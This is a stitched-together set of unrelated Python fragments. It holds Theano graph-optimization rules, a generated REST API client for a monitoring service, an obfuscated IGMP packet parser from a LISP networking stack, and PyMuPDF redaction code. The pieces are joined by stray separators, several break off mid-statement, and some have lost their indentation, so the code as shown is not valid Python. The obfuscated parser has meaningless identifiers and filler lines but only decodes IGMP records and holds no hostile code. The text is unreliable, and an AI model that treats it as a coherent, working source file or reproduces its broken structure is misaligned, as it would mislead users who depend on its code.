       node.inputs[0] is node.inputs[1]:
        return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[{minimum,maximum}](X, X) -> X
    if isinstance(node.op.scalar_op, (scalar.Minimum, scalar.Maximum)) and \
       node.inputs[0] is node.inputs[1]:
        return [node.inputs[0]]
    # Shape values are always >= 0, so comparisons against 0 are constant.
    # Elemwise[LT](X.shape[i], 0) -> Elemwise[zeros](X)
    if isinstance(node.op.scalar_op, scalar.LT) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Shape_i) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[GE](X.shape[i], 0) -> Elemwise[ones](X)
    if isinstance(node.op.scalar_op, scalar.GE) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Shape_i) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[maximum](X.shape[i], 0) -> X.shape[i]
    if isinstance(node.op.scalar_op, scalar.Maximum) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Shape_i) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [node.inputs[0]]
    # Elemwise[maximum](0, X.shape[i]) -> X.shape[i]
    if isinstance(node.op.scalar_op, scalar.Maximum) and \
       T.extract_constant(node.inputs[0], only_process_constants=True) == 0 and \
       node.inputs[1].owner and \
       isinstance(node.inputs[1].owner.op, Shape_i):
        return [node.inputs[1]]
    # Elemwise[minimum](X.shape[i], 0) -> 0
    if isinstance(node.op.scalar_op, scalar.Minimum) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Shape_i) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[minimum](0, X.shape[i]) -> 0
    if isinstance(node.op.scalar_op, scalar.Minimum) and \
       T.extract_constant(node.inputs[0], only_process_constants=True) == 0 and \
       node.inputs[1].owner and \
       isinstance(node.inputs[1].owner.op, Shape_i):
        return [T.zeros_like(node.inputs[1], dtype=node.outputs[0].dtype)]
    # A sum of Shape_i terms is also >= 0. In the all(...) checks below,
    # `var.owner and var.owner.op` evaluates to None when var has no owner,
    # and isinstance(None, Shape_i) is False — so ownerless inputs correctly
    # fail the test rather than raising.
    # Elemwise[LT](add([anything that is shapes]), 0) -> Elemwise[zeros](X)
    if isinstance(node.op.scalar_op, scalar.LT) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Elemwise) and \
       isinstance(node.inputs[0].owner.op.scalar_op, scalar.Add) and \
       all([isinstance(var.owner and var.owner.op, Shape_i)
            for var in node.inputs[0].owner.inputs]) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [T.zeros_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    # Elemwise[GE](add([anything that is shapes]), 0) -> Elemwise[ones](X)
    if isinstance(node.op.scalar_op, scalar.GE) and \
       node.inputs[0].owner and \
       isinstance(node.inputs[0].owner.op, Elemwise) and \
       isinstance(node.inputs[0].owner.op.scalar_op, scalar.Add) and \
       all([isinstance(var.owner and var.owner.op, Shape_i)
            for var in node.inputs[0].owner.inputs]) and \
       T.extract_constant(node.inputs[1], only_process_constants=True) == 0:
        return [T.ones_like(node.inputs[0], dtype=node.outputs[0].dtype)]
    return
@register_canonicalize
@register_specialize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_sum_prod_div_dimshuffle(node):
    """
    sum(a / dimshuffle{...}(b), axis=l) -> sum(a, axis={...}) / b,
    if dimension l of the DimShuffle is 'x'

    or

    prod(a / dimshuffle{...}(b), axis=l) ->
    prod(a, axis={...}) / b ** a.shape[l],
    if dimension l of the DimShuffle is 'x'
    """
    # It does not make much sense now to extend it to the case where the
    # dimshuffle is in the numerator, since elemwise inversion of the
    # denominator would still be needed before the summation or production.
    if isinstance(node.op, (T.Sum, T.elemwise.Prod)):
        axis = node.op.axis
        if axis is None:
            # Reducing over all axes; treat as the explicit axis list.
            axis = list(range(node.inputs[0].ndim))
        node_input = node.inputs[0]
        if node_input.owner and node_input.owner.op == T.true_div:
            numerator, denominator = node_input.owner.inputs

            # Old, bugged logic, reproduced here only to warn users
            if (config.warn.sum_div_dimshuffle_bug and
                    isinstance(node.op, T.Sum) and
                    numerator.owner and
                    isinstance(numerator.owner.op, T.DimShuffle)):
                # Check compatibility
                new_order = numerator.owner.op.new_order
                compatible_dims = True
                for ax in axis:
                    if len(new_order) <= ax or new_order[ax] != 'x':
                        compatible_dims = False
                        break

                if compatible_dims:
                    _logger.warn('WARNING: Your current code is fine, but'
                                 ' Theano versions between '
                                 'rev. 3bd9b789f5e8 (2010-06-16) and'
                                 ' cfc6322e5ad4 (2010-08-03) would '
                                 'have given an incorrect result. '
                                 'To disable this warning, set the Theano'
                                 ' flag warn.sum_div_dimshuffle_bug to'
                                 ' False.')

            if denominator.owner and isinstance(denominator.owner.op,
                                                T.DimShuffle):
                dimshuffle_input = denominator.owner.inputs[0]
                dimshuffle_order = denominator.owner.op.new_order

                # Split the reduction axes: those that are broadcast ('x')
                # in the denominator's dimshuffle can be pulled out of the
                # division; the rest must still be reduced afterwards.
                compatible_dims = []
                incompatible_dims = []
                for ax in axis:
                    if (ax < len(dimshuffle_order) and
                            dimshuffle_order[ax] == 'x'):
                        compatible_dims.append(ax)
                    else:
                        incompatible_dims.append(ax)

                # Re-index the incompatible axes into the coordinate system
                # that remains after the compatible axes are reduced away.
                reordered_incompatible_dims = []
                for ic_ax in incompatible_dims:
                    reordered_incompatible_dims.append(
                        ic_ax - sum(
                            [1 for c_ax in compatible_dims if c_ax < ic_ax]))

                if len(compatible_dims) > 0:
                    # Drop the 'x' entries of the dimshuffle that correspond
                    # to reduced axes.
                    optimized_dimshuffle_order = list(
                        ax for i, ax in enumerate(dimshuffle_order)
                        if (i not in axis) or (ax != 'x'))

                    # Removing leading 'x' (since it will be done automatically)
                    while (len(optimized_dimshuffle_order) > 0 and
                           optimized_dimshuffle_order[0] == 'x'):
                        del optimized_dimshuffle_order[0]

                    # if optimized_dimshuffle_order is sorted with
                    # not 'x', then dimshuffle is useless.
                    if all(i == e for i, e in
                           enumerate(optimized_dimshuffle_order)):
                        optimized_dimshuffle = dimshuffle_input
                    else:
                        optimized_dimshuffle = T.DimShuffle(
                            dimshuffle_input.type.broadcastable,
                            optimized_dimshuffle_order)(dimshuffle_input)

                    if (config.warn.sum_div_dimshuffle_bug and
                            isinstance(node.op, T.Sum)):
                        _logger.warn('WARNING: Your current code is fine,'
                                     ' but Theano versions between '
                                     'rev. 3bd9b789f5e8 (2010-06-16) and'
                                     ' cfc6322e5ad4 (2010-08-03) would '
                                     'have given an incorrect result. '
                                     'To disable this warning, set the'
                                     ' Theano flag '
                                     'warn.sum_div_dimshuffle_bug'
                                     ' to False.')

                    if isinstance(node.op, T.Sum):
                        # sum(a / b') -> sum(a) / b, then reduce leftovers.
                        op_on_compatible_dims = T.sum(
                            numerator, axis=compatible_dims)
                        rval = T.true_div(
                            op_on_compatible_dims,
                            optimized_dimshuffle)
                        if len(reordered_incompatible_dims) > 0:
                            rval = T.sum(rval,
                                         axis=reordered_incompatible_dims)
                    elif isinstance(node.op, T.elemwise.Prod):
                        # prod(a / b') -> prod(a) / b ** (number of reduced
                        # elements), then reduce leftovers.
                        op_on_compatible_dims = T.prod(
                            numerator, axis=compatible_dims)
                        dtype = numerator.dtype
                        rval = T.true_div(
                            op_on_compatible_dims,
                            (optimized_dimshuffle **
                                T.prod([numerator.shape[ax].astype(dtype)
                                        for ax in compatible_dims])))
                        if len(reordered_incompatible_dims) > 0:
                            rval = T.prod(rval,
                                          axis=reordered_incompatible_dims)
                    return [rval]
@register_canonicalize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_sum_prod_all_to_none(node):
    """
    Sum{0,1,...N} -> Sum{} or
    Prod{0,1,...N} -> Prod{}

    When a Sum/Prod names every axis explicitly, replace the axis list
    with None (the "all axes" shorthand), which permits more merging.
    """
    op = node.op
    if not isinstance(op, (T.Sum, T.elemwise.Prod)):
        return
    # Already in shorthand form — nothing to do.
    if op.axis is None:
        return
    inp = node.inputs[0]
    # Only rewrite when the named axes cover every dimension of the input.
    if set(op.axis) == set(range(inp.type.ndim)):
        op_cls = T.Sum if isinstance(op, T.Sum) else T.elemwise.Prod
        return [op_cls(axis=None, dtype=op.dtype)(inp)]
@register_canonicalize
@gof.local_optimizer([T.Sum, T.elemwise.Prod])
def local_op_of_op(node):
"""
Prod(Prod()) -> single Prod()
or
Sum(Sum()) -> single Sum()
"""
if isinstance(node.op, T.elemwise.Prod) or isinstance(node.op, T.Sum):
opt_type = T.Sum if isinstance(node.op, T.Sum) else T.elemwise.Prod
node_inps, = node.inputs
out_dtype = node.op.dtype
# We manipulate the graph so this is done to make sure the opt
# doesn't affect other computations.
if len(node_inps.clients) == 1:
if (node_inps.owner and
(isinstance(node_inps.owner.op, node.op.__class__))):
# check to see either the inner or outer prod is doing a
# product over all axis, in which case we can remove it
if node_inps.owner.op.axis is None or node.op.axis is None:
return [opt_type(None, dtype=out_dtype)(
node_inps.owner.inputs[0])]
# figure out which axes were in the original sum
newaxis = list(tuple(node_inps.owner.op.axis))
for i in node.op.axis:
new_i = i
for ii in node_inps.owner.op.axis:
if new_i >= ii:
new_i += 1
assert new_i not in newaxis
newaxis.append(new_i)
assert len(newaxis) == len(list(node_inps.owner.op.axis) +
list(node.op.axis))
# The old bugged logic. We keep it there to generate a warning
# when we generated bad code.
alldims = list(range(node_inps.owner.inputs[0].type.ndim))
alldims = [d for i, d in enumerate(alldims) if i
in node_inps.owner.op.axis]
alldims = [d for i, d in enumerate(alldims)
if i in node.op.axis]
newaxis_old = [i for i in
xrange(node_inps.owner.inputs[0].type.ndim)
if i not in alldims]
if (theano.config.warn.sum_sum_bug and
newaxis != newaxis_old and
len(newaxis) == len(newaxis_old)):
_logger.warn(
"WARNING (YOUR CURRENT CODE IS FINE): Theano "
"versions between version 9923a40c7b7a and August "
"2nd, 2010 generated bugged code in this case. "
"This happens when there are two consecutive sums "
"in the graph and the intermediate sum | |
# noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/report/reports', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReportBase', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_report_group(self, body, **kwargs): # noqa: E501
"""add report group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_report_group(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReportGroup body: (required)
:return: ReportGroup
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_report_group_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_report_group_with_http_info(body, **kwargs) # noqa: E501
return data
def add_report_group_with_http_info(self, body, **kwargs): # noqa: E501
"""add report group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_report_group_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ReportGroup body: (required)
:return: ReportGroup
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_report_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_report_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/report/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReportGroup', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_role(self, body, **kwargs): # noqa: E501
"""add role # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Role body: (required)
:return: Role
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_role_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_role_with_http_info(body, **kwargs) # noqa: E501
return data
def add_role_with_http_info(self, body, **kwargs): # noqa: E501
"""add role # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Role body: (required)
:return: Role
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_role`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/setting/roles', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Role', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_sdt(self, body, **kwargs): # noqa: E501
"""add SDT # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_sdt(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SDT body: (required)
:return: SDT
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_sdt_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_sdt_with_http_info(body, **kwargs) # noqa: E501
return data
def add_sdt_with_http_info(self, body, **kwargs): # noqa: E501
"""add SDT # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_sdt_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SDT body: (required)
:return: SDT
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_sdt" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_sdt`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/sdt/sdts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SDT', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_website(self, body, **kwargs): # noqa: E501
"""add website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_website(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_website_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_website_with_http_info(body, **kwargs) # noqa: E501
return data
def add_website_with_http_info(self, body, **kwargs): # noqa: E501
"""add website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_website_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_website" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_website`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_website_group(self, body, **kwargs): # noqa: E501
"""add website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, | |
OOooOOo
oO0oO0OO0oOO = ( O0ooOO in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( oO0oO0OO0oOO == False ) :
ooI1Iii = "{} ({})" . format ( O0ooOO , igmp_types [ O0ooOO ] ) if igmp_types . has_key ( O0ooOO ) else O0ooOO
if 32 - 32: oO0o
lprint ( "IGMP type {} not supported" . format ( ooI1Iii ) )
return ( [ ] )
if 52 - 52: oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if ( len ( Ii11IIiii ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if ( O0ooOO == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iI1i1iIi1iiII , False ) ) )
return ( [ [ None , iI1i1iIi1iiII , False ] ] )
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if ( O0ooOO in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( O0ooOO == 0x12 ) else 2 , bold ( iI1i1iIi1iiII , False ) ) )
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iI1i1iIi1iiII , True ] ] )
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
return ( [ ] )
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
if 56 - 56: IiII * II111iiii + Oo0Ooo - O0 - OoO0O00 . I1Ii111
if 53 - 53: i1IIi + IiII
if 90 - 90: II111iiii / oO0o / oO0o . OoOoOO00 / OoO0O00 / iIii1I11I1II1
o0oo0OoOo000 = O0o00oOOOO00 . address
Ii11IIiii = Ii11IIiii [ 8 : : ]
if 96 - 96: iIii1I11I1II1 % I1ii11iIi11i
Ii1ii111 = "BBHI"
Oo0OOoI1ii1i = struct . calcsize ( Ii1ii111 )
Iii111 = "I"
o0ooO0OOOoO0o = struct . calcsize ( Iii111 )
oo00Oo0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 61 - 61: I1IiiI % i1IIi
if 44 - 44: Ii1I * OoOoOO00 / Ii1I * I1IiiI - OOooOOo
if 36 - 36: OOooOOo
if 93 - 93: I11i . iIii1I11I1II1 + iIii1I11I1II1
ooo00Oo0 = [ ]
for IiIIi1IiiIiI in range ( o0oo0OoOo000 ) :
if ( len ( Ii11IIiii ) < Oo0OOoI1ii1i ) : return
I1III1Ii1III , O0o000 , O0o0oooO , ii1i1II11II1i = struct . unpack ( Ii1ii111 ,
Ii11IIiii [ : Oo0OOoI1ii1i ] )
if 3 - 3: I1ii11iIi11i + I1ii11iIi11i
Ii11IIiii = Ii11IIiii [ Oo0OOoI1ii1i : : ]
if 73 - 73: OoooooooOO
if ( lisp_igmp_record_types . has_key ( I1III1Ii1III ) == False ) :
lprint ( "Invalid record type {}" . format ( I1III1Ii1III ) )
continue
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
if 100 - 100: II111iiii + oO0o
oOoO0OoOOO = lisp_igmp_record_types [ I1III1Ii1III ]
O0o0oooO = socket . ntohs ( O0o0oooO )
O0o00oOOOO00 . address = socket . ntohl ( ii1i1II11II1i )
iI1i1iIi1iiII = O0o00oOOOO00 . print_address_no_iid ( )
if 16 - 16: Ii1I
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( oOoO0OoOOO , iI1i1iIi1iiII , O0o0oooO ) )
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if 24 - 24: IiII / Oo0Ooo
o0OOO0oo00oO = False
if ( I1III1Ii1III in ( 1 , 5 ) ) : o0OOO0oo00oO = True
if ( I1III1Ii1III in ( 2 , 4 ) and O0o0oooO == 0 ) : o0OOO0oo00oO = True
I1iiI1I = "join" if ( o0OOO0oo00oO ) else "leave"
if 54 - 54: OOooOOo - ooOoO0o - iIii1I11I1II1
if 29 - 29: ooOoO0o
if 31 - 31: o0oOOo0O0Ooo / IiII - oO0o / OoOoOO00 * IiII * i1IIi
if 45 - 45: OoOoOO00 + iII111i % iIii1I11I1II1 - IiII * OOooOOo
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
if 97 - 97: ooOoO0o
if 14 - 14: iII111i + iII111i
if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO
if 19 - 19: Ii1I . oO0o
if 26 - 26: OOooOOo + II111iiii
if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
if 31 - 31: ooOoO0o / Ii1I . Ii1I - I1IiiI - Oo0Ooo . II111iiii
if ( O0o0oooO == 0 ) :
ooo00Oo0 . append ( [ None , iI1i1iIi1iiII , o0OOO0oo00oO ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( I1iiI1I , False ) ,
bold ( iI1i1iIi1iiII , False ) ) )
if 82 - 82: Oo0Ooo % Oo0Ooo
if 17 - 17: OOooOOo % Oo0Ooo . I1IiiI * O0 * oO0o % OoOoOO00
if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
for oOoOoO0O in range ( O0o0oooO ) :
if ( len ( Ii11IIiii ) < o0ooO0OOOoO0o ) : return
ii1i1II11II1i = struct . unpack ( Iii111 , Ii11IIiii [ : o0ooO0OOOoO0o ] ) [ 0 ]
oo00Oo0 . address = socket . ntohl ( ii1i1II11II1i )
oo0iii = oo00Oo0 . print_address_no_iid ( )
ooo00Oo0 . append ( [ oo0iii , iI1i1iIi1iiII , o0OOO0oo00oO ] )
lprint ( "{} ({}, {})" . format ( I1iiI1I ,
green ( oo0iii , False ) , bold ( iI1i1iIi1iiII , False ) ) )
Ii11IIiii = Ii11IIiii [ o0ooO0OOOoO0o : : ]
if 68 - 68: Ii1I % Oo0Ooo + I1ii11iIi11i + I1ii11iIi11i + oO0o % Oo0Ooo
if 22 - 22: OoO0O00
if 40 - 40: I1ii11iIi11i * I1Ii111
if 6 - 6: i11iIiiIii . o0oOOo0O0Ooo * iIii1I11I1II1 . OoOoOO00 . II111iiii
if 67 - 67: OoO0O00 - Oo0Ooo + OOooOOo / OoOoOO00 + OOooOOo
if 18 - 18: Oo0Ooo % OoOoOO00 % i1IIi
if 66 - 66: OoOoOO00 % II111iiii
if 16 - 16: i11iIiiIii - I1IiiI + ooOoO0o * oO0o
return ( ooo00Oo0 )
if 30 - 30: II111iiii / o0oOOo0O0Ooo
if 57 - 57: I11i / I1ii11iIi11i . I11i
if 68 - 68: OoOoOO00 + O0 . I1IiiI
if 26 - 26: I1ii11iIi11i
if 98 - 98: Oo0Ooo
if 72 - 72: oO0o | |
Must be one of the CJK or Base-14 set, else
the rectangle is returned unchanged.
fsize: the fontsize
Returns:
A rectangle to use instead of the annot rectangle.
"""
if not text:
return annot_rect
try:
text_width = getTextlength(text, font, fsize)
except ValueError: # unsupported font
return annot_rect
line_height = fsize * 1.2
limit = annot_rect.width
h = math.ceil(text_width / limit) * line_height # estimate rect height
if h >= annot_rect.height:
return annot_rect
r = annot_rect
y = (annot_rect.tl.y + annot_rect.bl.y - h) * 0.5
r.y0 = y
return r
CheckParent(page)
doc = page.parent
if doc.isEncrypted or doc.isClosed:
raise ValueError("document closed or encrypted")
if not doc.isPDF:
raise ValueError("not a PDF")
redact_annots = [] # storage of annot values
for annot in page.annots(types=(PDF_ANNOT_REDACT,)): # loop redactions
redact_annots.append(annot._get_redact_values()) # save annot values
if redact_annots == []: # any redactions on this page?
return False # no redactions
rc = page._apply_redactions(images) # call MuPDF redaction process step
if not rc: # should not happen really
raise ValueError("Error applying redactions.")
# now write replacement text in old redact rectangles
shape = page.newShape()
for redact in redact_annots:
annot_rect = redact["rect"]
fill = redact["fill"]
if fill:
shape.drawRect(annot_rect) # colorize the rect background
shape.finish(fill=fill, color=fill)
if "text" in redact.keys(): # if we also have text
trect = center_rect( # try finding vertical centered sub-rect
annot_rect, redact["text"], redact["fontname"], redact["fontsize"]
)
fsize = redact["fontsize"] # start with stored fontsize
rc = -1
while rc < 0 and fsize >= 4: # while not enough room
rc = shape.insertTextbox( # (re-) try insertion
trect,
redact["text"],
fontname=redact["fontname"],
fontsize=fsize,
color=redact["text_color"],
align=redact["align"],
)
fsize -= 0.5 # reduce font if unsuccessful
